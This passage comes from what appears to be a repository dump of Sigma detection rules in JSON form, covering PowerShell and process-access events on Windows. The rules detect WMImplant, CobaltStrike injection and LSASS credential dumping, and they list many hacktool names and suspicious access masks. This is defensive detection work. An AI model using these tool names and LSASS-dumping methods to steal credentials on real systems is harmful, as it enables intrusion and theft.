    "content": "title: WMImplant Hack Tool\nid: 8028c2c3-e25a-46e3-827f-bbb5abf181d7\nstatus: test\ndescription: Detects parameters used by WMImplant\nreferences:\n    - https://github.com/FortyNorthSecurity/WMImplant\nauthor: NVISO\ndate: 2020-03-26\nmodified: 2022-12-25\ntags:\n    - attack.execution\n    - attack.t1047\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'WMImplant'\n            - ' change_user '\n            - ' gen_cli '\n            - ' command_exec '\n            - ' disable_wdigest '\n            - ' disable_winrm '\n            - ' enable_wdigest '\n            - ' enable_winrm '\n            - ' registry_mod '\n            - ' remote_posh '\n            - ' sched_job '\n            - ' service_mod '\n            - ' process_kill '\n            # - ' process_start '\n            - ' active_users '\n            - ' basic_info '\n            # - ' drive_list '\n            # - ' installed_programs '\n            - ' power_off '\n            - ' vacant_system '\n            - ' logon_events '\n    condition: selection\nfalsepositives:\n    - Administrative scripts that use the same keywords.\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_x509enrollment.yml",
    "content": "title: Suspicious X509Enrollment - Ps Script\nid: 504d63cb-0dba-4d02-8531-e72981aace2c\nrelated:\n    - id: 114de787-4eb2-48cc-abdb-c0b449f93ea4\n      type: similar\nstatus: test\ndescription: Detect use of X509Enrollment\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41\n    - https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115\nauthor: frack113\ndate: 2022-12-23\ntags:\n    - attack.defense-evasion\n    - attack.t1553.004\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'X509Enrollment.CBinaryConverter'\n            - '884e2002-217d-11da-b2a4-000e7bbb2b09'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_xml_iex.yml",
    "content": "title: Powershell XML Execute Command\nid: 6c6c6282-7671-4fe9-a0ce-a2dcebdc342b\nstatus: test\ndescription: |\n    Adversaries may abuse PowerShell commands and scripts for execution.\n    PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\n    Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-8---powershell-xml-requests\nauthor: frack113\ndate: 2022-01-19\nmodified: 2023-01-19\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_xml:\n        ScriptBlockText|contains|all:\n            - 'New-Object'\n            - 'System.Xml.XmlDocument'\n            - '.Load'\n    selection_exec:\n        ScriptBlockText|contains:\n            - 'IEX '\n            - 'Invoke-Expression '\n            - 'Invoke-Command '\n            - 'ICM -'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administrative script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_cmstp_execution_by_access.yml",
    "content": "title: CMSTP Execution Process Access\nid: 3b4b232a-af90-427c-a22f-30b0c0837b95\nstatus: stable\ndescription: Detects various indicators of Microsoft Connection Manager Profile Installer execution\nreferences:\n    - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/\nauthor: Nik Seetharaman\ndate: 2018-07-16\nmodified: 2021-06-27\ntags:\n    - attack.defense-evasion\n    - attack.t1218.003\n    - attack.execution\n    - attack.t1559.001\n    - attack.g0069\n    - attack.g0080\n    - car.2019-04-001\nlogsource:\n    product: windows\n    category: process_access\ndetection:\n    # Process Access Call Trace\n    selection:\n        CallTrace|contains: 'cmlua.dll'\n    condition: selection\nfalsepositives:\n    - Legitimate CMSTP use (unlikely in modern enterprise environments)\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_hktl_cobaltstrike_bof_injection_pattern.yml",
    "content": "title: HackTool - CobaltStrike BOF Injection Pattern\nid: 09706624-b7f6-455d-9d02-adee024cee1d\nstatus: test\ndescription: Detects a typical pattern of a CobaltStrike BOF which inject into other processes\nreferences:\n    - https://github.com/boku7/injectAmsiBypass\n    - https://github.com/boku7/spawn\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-04\nmodified: 2023-11-28\ntags:\n    - attack.execution\n    - attack.t1106\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        CallTrace|re: '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\\+[a-z0-9]{4,6}\\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\\+[a-z0-9]{4,6}\\|UNKNOWN\\([A-Z0-9]{16}\\)$'\n        GrantedAccess:\n            - '0x1028'\n            - '0x1fffff'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_hktl_generic_access.yml",
    "content": "title: HackTool - Generic Process Access\nid: d0d2f720-d14f-448d-8242-51ff396a334e\nstatus: test\ndescription: Detects process access requests from hacktool processes based on their default image name\nreferences:\n    - https://jsecurity101.medium.com/bypassing-access-mask-auditing-strategies-480fb641c158\n    - https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html\nauthor: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel\ndate: 2023-11-27\ntags:\n    - attack.credential-access\n    - attack.t1003.001\n    - attack.s0002\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        - SourceImage|endswith:\n              - '\\Akagi.exe'\n              - '\\Akagi64.exe'\n              - '\\atexec_windows.exe'\n              - '\\Certify.exe'\n              - '\\Certipy.exe'\n              - '\\CoercedPotato.exe'\n              - '\\crackmapexec.exe'\n              - '\\CreateMiniDump.exe'\n              - '\\dcomexec_windows.exe'\n              - '\\dpapi_windows.exe'\n              - '\\findDelegation_windows.exe'\n              - '\\GetADUsers_windows.exe'\n              - '\\GetNPUsers_windows.exe'\n              - '\\getPac_windows.exe'\n              - '\\getST_windows.exe'\n              - '\\getTGT_windows.exe'\n              - '\\GetUserSPNs_windows.exe'\n              - '\\gmer.exe'\n              - '\\hashcat.exe'\n              - '\\htran.exe'\n              - '\\ifmap_windows.exe'\n              - '\\impersonate.exe'\n              - '\\Inveigh.exe'\n              - '\\LocalPotato.exe'\n              - '\\mimikatz_windows.exe'\n              - '\\mimikatz.exe'\n              - '\\netview_windows.exe'\n              - '\\nmapAnswerMachine_windows.exe'\n              - '\\opdump_windows.exe'\n              - '\\PasswordDump.exe'\n              - '\\Potato.exe'\n              - '\\PowerTool.exe'\n              - '\\PowerTool64.exe'\n              - '\\psexec_windows.exe'\n              - '\\PurpleSharp.exe'\n              - '\\pypykatz.exe'\n              - '\\QuarksPwDump.exe'\n              - '\\rdp_check_windows.exe'\n              - '\\Rubeus.exe'\n              - '\\SafetyKatz.exe'\n              - '\\sambaPipe_windows.exe'\n              - '\\SelectMyParent.exe'\n              - '\\SharpChisel.exe'\n              - '\\SharPersist.exe'\n              - '\\SharpEvtMute.exe'\n              - '\\SharpImpersonation.exe'\n              - '\\SharpLDAPmonitor.exe'\n              - '\\SharpLdapWhoami.exe'\n              - '\\SharpUp.exe'\n              - '\\SharpView.exe'\n              - '\\smbclient_windows.exe'\n              - '\\smbserver_windows.exe'\n              - '\\sniff_windows.exe'\n              - '\\sniffer_windows.exe'\n              - '\\split_windows.exe'\n              - '\\SpoolSample.exe'\n              - '\\Stracciatella.exe'\n              - '\\SysmonEOP.exe'\n              - '\\temp\\rot.exe'\n              - '\\ticketer_windows.exe'\n              - '\\TruffleSnout.exe'\n              - '\\winPEASany_ofs.exe'\n              - '\\winPEASany.exe'\n              - '\\winPEASx64_ofs.exe'\n              - '\\winPEASx64.exe'\n              - '\\winPEASx86_ofs.exe'\n              - '\\winPEASx86.exe'\n              - '\\xordump.exe'\n        - SourceImage|contains:\n              - '\\goldenPac'\n              - '\\just_dce_'\n              - '\\karmaSMB'\n              - '\\kintercept'\n              - '\\LocalPotato'\n              - '\\ntlmrelayx'\n              - '\\rpcdump'\n              - '\\samrdump'\n              - '\\secretsdump'\n              - '\\smbexec'\n              - '\\smbrelayx'\n              - '\\wmiexec'\n              - '\\wmipersist'\n              - 'HotPotato'\n              - 'Juicy Potato'\n              - 'JuicyPotato'\n              - 'PetitPotam'\n              - 'RottenPotato'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_hktl_handlekatz_lsass_access.yml",
    "content": "title: HackTool - HandleKatz Duplicating LSASS Handle\nid: b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5\nstatus: test\ndescription: Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles\nreferences:\n    - https://github.com/codewhitesec/HandleKatz\nauthor: Bhabesh Raj (rule), @thefLinkk\ndate: 2022-06-27\nmodified: 2023-11-28\ntags:\n    - attack.execution\n    - attack.t1106\n    - attack.defense-evasion\n    - attack.t1003.001\n    - attack.credential-access\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        TargetImage|endswith: '\\lsass.exe' # Theoretically, can be any benign process holding handle to LSASS\n        GrantedAccess: '0x1440' # Only PROCESS_DUP_HANDLE, PROCESS_QUERY_LIMITED_INFORMATION, PROCESS_QUERY_INFORMATION\n        # Example: C:\\Windows\\SYSTEM32\\ntdll.dll+9d234\\|UNKNOWN(00000000001C119B)\n        CallTrace|startswith: 'C:\\Windows\\System32\\ntdll.dll+'\n        CallTrace|contains: '|UNKNOWN('\n        CallTrace|endswith: ')'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_hktl_littlecorporal_generated_maldoc.yml",
    "content": "title: HackTool - LittleCorporal Generated Maldoc Injection\nid: 7bdde3bf-2a42-4c39-aa31-a92b3e17afac\nstatus: test\ndescription: Detects the process injection of a LittleCorporal generated Maldoc.\nreferences:\n    - https://github.com/connormcgarr/LittleCorporal\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-09\nmodified: 2023-11-28\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.t1204.002\n    - attack.t1055.003\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        SourceImage|endswith: '\\winword.exe'\n        CallTrace|contains|all:\n            - ':\\Windows\\Microsoft.NET\\Framework64\\v2.'\n            - 'UNKNOWN'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_hktl_sysmonente.yml",
    "content": "title: HackTool - SysmonEnte Execution\nid: d29ada0f-af45-4f27-8f32-f7b77c3dbc4e\nstatus: test\ndescription: Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon\nreferences:\n    - https://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html\n    - https://github.com/codewhitesec/SysmonEnte/\n    - https://github.com/codewhitesec/SysmonEnte/blob/fe267690fcc799fbda15398243615a30451d9099/screens/1.png\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-09-07\nmodified: 2023-11-28\ntags:\n    - attack.defense-evasion\n    - attack.t1562.002\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection_sysmon:\n        TargetImage|contains:\n            - ':\\Windows\\Sysmon.exe'\n            - ':\\Windows\\Sysmon64.exe'\n        GrantedAccess: '0x1400'\n    selection_calltrace:\n        CallTrace: 'Ente'\n    filter_main_generic:\n        SourceImage|contains:\n            - ':\\Program Files (x86)\\'\n            - ':\\Program Files\\'\n            - ':\\Windows\\System32\\'\n            - ':\\Windows\\SysWOW64\\'\n    filter_main_msdefender:\n        SourceImage|contains: ':\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n        SourceImage|endswith: '\\MsMpEng.exe'\n    condition: ( selection_sysmon and not 1 of filter_main_* ) or selection_calltrace\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml",
    "content": "title: Lsass Memory Dump via Comsvcs DLL\nid: a49fa4d5-11db-418c-8473-1e014a8dd462\nstatus: test\ndescription: Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.\nreferences:\n    - https://twitter.com/shantanukhande/status/1229348874298388484\n    - https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-10-20\nmodified: 2023-11-29\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        TargetImage|endswith: '\\lsass.exe'\n        SourceImage|endswith: '\\rundll32.exe'\n        CallTrace|contains: 'comsvcs.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_lsass_dump_keyword_image.yml",
    "content": "title: LSASS Memory Access by Tool With Dump Keyword In Name\nid: 9bd012ee-0dff-44d7-84a0-aa698cfd87a3\nstatus: test\ndescription: Detects LSASS process access requests from a source process with the \"dump\" keyword in its image name.\nreferences:\n    - https://twitter.com/_xpn_/status/1491557187168178176\n    - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-02-10\nmodified: 2023-11-29\ntags:\n    - attack.credential-access\n    - attack.t1003.001\n    - attack.s0002\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        TargetImage|endswith: '\\lsass.exe'\n        SourceImage|contains: 'dump'\n        GrantedAccess|endswith:\n            - '10'\n            - '30'\n            - '50'\n            - '70'\n            - '90'\n            - 'B0'\n            - 'D0'\n            - 'F0'\n            - '18'\n            - '38'\n            - '58'\n            - '78'\n            - '98'\n            - 'B8'\n            - 'D8'\n            - 'F8'\n            - '1A'\n            - '3A'\n            - '5A'\n            - '7A'\n            - '9A'\n            - 'BA'\n            - 'DA'\n            - 'FA'\n            - '0x14C2'  # https://github.com/b4rtik/ATPMiniDump/blob/76304f93b390af3bb66e4f451ca16562a479bdc9/ATPMiniDump/ATPMiniDump.c\n            - 'FF'\n    condition: selection\nfalsepositives:\n    - Rare programs that contain the word dump in their name and access lsass\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_lsass_memdump.yml",
    "content": "title: Potential Credential Dumping Activity Via LSASS\nid: 5ef9853e-4d0e-4a70-846f-a9ca37d876da\nstatus: test\ndescription: |\n    Detects process access requests to the LSASS process with specific call trace calls and access masks.\n    This behaviour is expressed by many credential dumping tools such as Mimikatz, NanoDump, Invoke-Mimikatz, Procdump and even the Taskmgr dumping feature.\nreferences:\n    - https://web.archive.org/web/20230329170326/https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html\n    - https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md\n    - https://research.splunk.com/endpoint/windows_possible_credential_dumping/\nauthor: Samir Bousseaden, Michael Haag\ndate: 2019-04-03\nmodified: 2024-03-02\ntags:\n    - attack.credential-access\n    - attack.t1003.001\n    - attack.s0002\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        TargetImage|endswith: '\\lsass.exe'\n        GrantedAccess|contains:\n            - '0x1038'\n            - '0x1438'\n            - '0x143a'\n            - '0x1fffff' # Too many false positives\n            # - '0x01000'  # Too many false positives\n            # - '0x1010'   # Too many false positives\n            # - '0x1400'  # Too many false positives\n            # - '0x1410' # Too many false positives\n            # - '0x40'   # Too many false positives\n        CallTrace|contains:\n            - 'dbgcore.dll'\n            - 'dbghelp.dll'\n            - 'kernel32.dll'\n            - 'kernelbase.dll'\n            - 'ntdll.dll'\n    filter_main_system_user:\n        SourceUser|contains: # Covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    filter_optional_thor:\n        CallTrace|contains|all:\n            - ':\\Windows\\Temp\\asgard2-agent\\'\n            - '\\thor\\thor64.exe+'\n            - '|UNKNOWN('\n        GrantedAccess: '0x103800'\n    filter_optional_sysmon:\n        SourceImage|endswith: ':\\Windows\\Sysmon64.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_lsass_python_based_tool.yml",
    "content": "title: Credential Dumping Activity By Python Based Tool\nid: f8be3e82-46a3-4e4e-ada5-8e538ae8b9c9\nrelated:\n    - id: 4b9a8556-99c4-470b-a40c-9c8d02c77ed0\n      type: obsolete\n    - id: 7186e989-4ed7-4f4e-a656-4674b9e3e48b\n      type: obsolete\nstatus: stable\ndescription: Detects LSASS process access for potential credential dumping by a Python-like tool such as LaZagne or Pypykatz.\nreferences:\n    - https://twitter.com/bh4b3sh/status/1303674603819081728\n    - https://github.com/skelsec/pypykatz\nauthor: Bhabesh Raj, Jonhnathan Ribeiro\ndate: 2023-11-27\nmodified: 2023-11-29\ntags:\n    - attack.credential-access\n    - attack.t1003.001\n    - attack.s0349\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        TargetImage|endswith: '\\lsass.exe'\n        CallTrace|contains|all:\n            - '_ctypes.pyd+'\n            - ':\\Windows\\System32\\KERNELBASE.dll+'\n            - ':\\Windows\\SYSTEM32\\ntdll.dll+'\n        CallTrace|contains:\n            - 'python27.dll+'\n            - 'python3*.dll+'\n        GrantedAccess: '0x1FFFFF'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_lsass_remote_access_trough_winrm.yml",
    "content": "title: Remote LSASS Process Access Through Windows Remote Management\nid: aa35a627-33fb-4d04-a165-d33b4afca3e8\nstatus: stable\ndescription: Detects remote access to the LSASS process via WinRM. This could be a sign of credential dumping from tools like mimikatz.\nreferences:\n    - https://pentestlab.blog/2018/05/15/lateral-movement-winrm/\nauthor: Patryk Prauze - ING Tech\ndate: 2019-05-20\nmodified: 2023-11-29\ntags:\n    - attack.credential-access\n    - attack.execution\n    - attack.t1003.001\n    - attack.t1059.001\n    - attack.lateral-movement\n    - attack.t1021.006\n    - attack.s0002\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        TargetImage|endswith: '\\lsass.exe'\n        SourceImage|endswith: ':\\Windows\\system32\\wsmprovhost.exe'\n    filter_main_access:\n        GrantedAccess: '0x80000000'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_lsass_seclogon_access.yml",
    "content": "title: Suspicious LSASS Access Via MalSecLogon\nid: 472159c5-31b9-4f56-b794-b766faa8b0a7\nstatus: test\ndescription: Detects suspicious access to LSASS handle via a call trace to \"seclogon.dll\" with a suspicious access right.\nreferences:\n    - https://twitter.com/SBousseaden/status/1541920424635912196\n    - https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml\n    - https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html\nauthor: Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-29\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        TargetImage|endswith: '\\lsass.exe'\n        SourceImage|endswith: '\\svchost.exe'\n        GrantedAccess: '0x14c0'\n        CallTrace|contains: 'seclogon.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_lsass_susp_access_flag.yml",
    "content": "title: Potentially Suspicious GrantedAccess Flags On LSASS\nid: a18dd26b-6450-46de-8c91-9659150cf088\nrelated:\n    - id: 32d0d3e2-e58d-4d41-926b-18b520b2b32d\n      type: similar\nstatus: test\ndescription: Detects process access requests to LSASS process with potentially suspicious access flags\nreferences:\n    - https://learn.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights\n    - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow\n    - https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\n    - https://web.archive.org/web/20230420013146/http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf\nauthor: Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community\ndate: 2021-11-22\nmodified: 2023-11-29\ntags:\n    - attack.credential-access\n    - attack.t1003.001\n    - attack.s0002\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection_target:\n        TargetImage|endswith: '\\lsass.exe'\n    selection_access:\n        - GrantedAccess|endswith:\n              # - '10'  # covered in rule 678dfc63-fefb-47a5-a04c-26bcf8cc9f65\n              - '30'\n              - '50'\n              - '70'\n              - '90'\n              - 'B0'\n              - 'D0'\n              - 'F0'\n              - '18'\n              - '38'\n              - '58'\n              - '78'\n              - '98'\n              - 'B8'\n              - 'D8'\n              - 'F8'\n              - '1A'\n              - '3A'\n              - '5A'\n              - '7A'\n              - '9A'\n              - 'BA'\n              - 'DA'\n              - 'FA'\n              - '0x14C2'  # https://github.com/b4rtik/ATPMiniDump/blob/76304f93b390af3bb66e4f451ca16562a479bdc9/ATPMiniDump/ATPMiniDump.c\n        - GrantedAccess|startswith:\n              - '0x100000'\n              - '0x1418'    # car.2019-04-004\n              - '0x1438'    # car.2019-04-004\n              - '0x143a'    # car.2019-04-004\n              - '0x1f0fff'\n              - '0x1f1fff'\n              - '0x1f2fff'\n              - '0x1f3fff'\n              - '0x40'\n              # - '0x1000'  # minimum access requirements to query basic info from service\n              # - '0x1010'    # car.2019-04-004\n              # - '0x1400'\n              # - '0x1410'    # car.2019-04-004 # Covered by 678dfc63-fefb-47a5-a04c-26bcf8cc9f65\n    filter_main_generic:\n        # When using this rule. Remove this filter and replace it by the path of the specific AV you use\n        SourceImage|contains:\n            - ':\\Program Files (x86)\\'\n            - ':\\Program Files\\'\n            - ':\\Windows\\System32\\'\n            - ':\\Windows\\SysWOW64\\'\n    filter_optional_malwarebytes:\n        SourceImage|endswith: ':\\ProgramData\\MALWAREBYTES\\MBAMSERVICE\\ctlrupdate\\mbupdatr.exe'\n    filter_optional_vscode:\n        SourceImage|endswith: '\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe'\n    filter_main_windefend_1:\n        SourceImage|contains: ':\\ProgramData\\Microsoft\\Windows Defender\\'\n        SourceImage|endswith: '\\MsMpEng.exe'\n    filter_main_windefend_2:\n        CallTrace|contains|all:\n            - '|?:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{'\n            - '}\\mpengine.dll+'\n        GrantedAccess: '0x1418'\n    filter_main_windefend_3:\n        CallTrace|contains:\n            - '|c:\\program files\\windows defender\\mprtp.dll'\n            - '|c:\\program files\\windows defender\\MpClient.dll'\n    filter_optional_vmwaretools:\n        SourceImage|contains: ':\\ProgramData\\VMware\\VMware Tools\\'\n        SourceImage|endswith: '\\vmtoolsd.exe'\n    filter_optional_sysinternals_process_explorer:\n        SourceImage|endswith:\n            - '\\PROCEXP64.EXE'\n            - '\\PROCEXP.EXE'\n        GrantedAccess: '0x40'\n    filter_optional_mbami:\n        SourceImage|endswith: '\\MBAMInstallerService.exe'\n        GrantedAccess: '0x40'\n    filter_optional_nextron:\n        SourceImage|endswith:\n            - '\\aurora-agent-64.exe'\n            - '\\aurora-agent.exe'\n            - '\\thor.exe'\n            - '\\thor64.exe'\n        GrantedAccess: '0x40'\n    filter_main_explorer:\n        SourceImage|endswith: '\\explorer.exe'\n        GrantedAccess: '0x401'\n    filter_optional_sysinternals_handle:\n        SourceImage|endswith:\n            - '\\handle.exe'\n            - '\\handle64.exe'\n        GrantedAccess: '0x40'\n    filter_optional_webex:\n        SourceImage|endswith: '\\AppData\\Local\\WebEx\\WebexHost.exe'\n        GrantedAccess: '0x401'\n    filter_optional_steam_apps:\n        SourceImage|contains: '\\SteamLibrary\\steamapps\\'\n    condition: all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate software such as AV and EDR\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_lsass_werfault.yml",
    "content": "title: Credential Dumping Attempt Via WerFault\nid: e5b33f7d-eb93-48b6-9851-09e1e610b6d7\nstatus: test\ndescription: Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.\nreferences:\n    - https://github.com/helpsystems/nanodump/commit/578116faea3d278d53d70ea932e2bbfe42569507\nauthor: Florian Roth (Nextron Systems)\ndate: 2012-06-27\nmodified: 2023-11-29\ntags:\n    - attack.credential-access\n    - attack.t1003.001\n    - attack.s0002\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        SourceImage|endswith: '\\WerFault.exe'\n        TargetImage|endswith: '\\lsass.exe'\n        GrantedAccess: '0x1FFFFF'\n    condition: selection\nfalsepositives:\n    - Actual failures in lsass.exe that trigger a crash dump (unlikely)\n    - Unknown cases in which WerFault accesses lsass.exe\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_lsass_whitelisted_process_names.yml",
    "content": "title: LSASS Access From Potentially White-Listed Processes\nid: 4be8b654-0c01-4c9d-a10c-6b28467fc651\nstatus: test\ndescription: |\n    Detects a possible process memory dump that uses a white-listed filename like TrolleyExpress.exe as a way to dump the LSASS process memory without Microsoft Defender interference\nreferences:\n    - https://twitter.com/_xpn_/status/1491557187168178176\n    - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz\n    - https://twitter.com/mrd0x/status/1460597833917251595\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-02-10\nmodified: 2023-11-29\ntags:\n    - attack.credential-access\n    - attack.t1003.001\n    - attack.s0002\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        TargetImage|endswith: '\\lsass.exe'\n        SourceImage|endswith:\n            - '\\TrolleyExpress.exe'  # Citrix\n            - '\\ProcessDump.exe'     # Cisco Jabber\n            - '\\dump64.exe'          # Visual Studio\n        GrantedAccess|endswith:\n            - '10'\n            - '30'\n            - '50'\n            - '70'\n            - '90'\n            - 'B0'\n            - 'D0'\n            - 'F0'\n            - '18'\n            - '38'\n            - '58'\n            - '78'\n            - '98'\n            - 'B8'\n            - 'D8'\n            - 'F8'\n            - '1A'\n            - '3A'\n            - '5A'\n            - '7A'\n            - '9A'\n            - 'BA'\n            - 'DA'\n            - 'FA'\n            - '0x14C2'  # https://github.com/b4rtik/ATPMiniDump/blob/76304f93b390af3bb66e4f451ca16562a479bdc9/ATPMiniDump/ATPMiniDump.c\n            - 'FF'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_susp_all_access_uncommon_target.yml",
    "content": "title: Uncommon Process Access Rights For Target Image\nid: a24e5861-c6ca-4fde-a93c-ba9256feddf0\nstatus: test\ndescription: |\n    Detects process access request to uncommon target images with a \"PROCESS_ALL_ACCESS\" access mask.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2024-05-27\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055.011\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        TargetImage|endswith:\n            # Note: Add additional uncommon targets to increase coverage.\n            - '\\calc.exe'\n            - '\\calculator.exe'\n            - '\\mspaint.exe'\n            - '\\notepad.exe'\n            - '\\ping.exe'\n            - '\\wordpad.exe'\n            - '\\write.exe'\n        GrantedAccess: '0x1FFFFF' # PROCESS_ALL_ACCESS - All possible access rights for a process object.\n    condition: selection\nfalsepositives:\n    - Unknown\n# Note: please upgrade to a higher level after an initial test/tuning.\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_access/proc_access_win_susp_dbgcore_dbghelp_load.yml",
